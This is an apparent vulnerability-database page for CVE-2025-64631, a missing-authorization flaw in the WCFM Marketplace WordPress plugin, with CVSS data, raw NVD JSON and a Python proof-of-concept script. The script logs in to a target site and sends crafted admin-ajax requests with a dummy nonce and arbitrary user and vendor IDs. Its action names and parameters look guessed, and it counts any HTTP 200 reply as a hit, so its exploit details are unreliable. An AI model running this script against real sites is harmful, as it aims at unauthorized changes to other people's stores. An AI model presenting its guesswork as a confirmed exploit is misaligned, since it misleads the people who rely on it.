Security Vulnerability Report
CVE-2025-64631 CVSS 4.9 MEDIUM


Published: 2025-12-16 09:15:55
Last Modified: 2026-04-27 16:16:43

Description

Missing Authorization vulnerability in WC Lovers WCFM Marketplace wc-multivendor-marketplace allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WCFM Marketplace: from n/a through <= 3.7.1.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WCFM Marketplace <= 3.7.1 (all versions up to and including 3.7.1)
WCFM Marketplace from any version through 3.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64631 PoC - WCFM Marketplace Missing Authorization
# Affected: WCFM Marketplace <= 3.7.1
import requests
import sys

TARGET_URL = "https://target-site.com"
# WordPress admin or high-privilege user credentials (the CVSS vector is PR:H)
USERNAME = "admin"
PASSWORD = "password"


def get_nonce(url):
    """Log in to WordPress and return an authenticated session (None on failure)."""
    session = requests.Session()
    login_url = f"{url}/wp-login.php"
    # Login to WordPress
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f'{url}/wp-admin/',
        'testcookie': '1',
    }
    session.post(login_url, data=login_data)
    # WordPress names its auth cookie "wordpress_logged_in_<hash>", so match on the prefix
    if not any(c.name.startswith('wordpress_logged_in') for c in session.cookies):
        print("[-] Login failed")
        return None
    print("[+] Login successful")
    return session


def exploit_authorization_bypass(url, session):
    """Probe the AJAX handler for the missing authorization check."""
    # Target endpoint - typically AJAX handler with missing capability check
    exploit_endpoints = [
        f"{url}/wp-admin/admin-ajax.php",
    ]
    # Common WCFM Marketplace vulnerable actions
    vulnerable_actions = [
        "wcfm_ajax_controller",
        "wcfm_settings_update",
        "wcfm_vendor_settings_update",
    ]
    for endpoint in exploit_endpoints:
        for action in vulnerable_actions:
            # Construct exploit request with arbitrary user_id
            # This exploits the missing authorization check
            exploit_data = {
                'action': action,
                'wcfm_ajax_nonce': 'dummy',  # May be missing validation
                'vendor_id': '1',            # Arbitrary vendor ID
                'user_id': '1',              # Arbitrary user ID - exploitation point
            }
            print(f"[*] Testing {endpoint} with action: {action}")
            resp = session.post(endpoint, data=exploit_data)
            if resp.status_code == 200:
                print(f"[+] Possible vulnerable endpoint found: {action}")
                print(f"    Response: {resp.text[:200]}")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        sys.exit(1)
    url = sys.argv[1]
    session = get_nonce(url)
    if session:
        exploit_authorization_bypass(url, session)
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-64631", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:55.330", "lastModified": "2026-04-27T16:16:42.630", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WC Lovers WCFM Marketplace wc-multivendor-marketplace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCFM Marketplace: from n/a through <= 3.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-6-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
```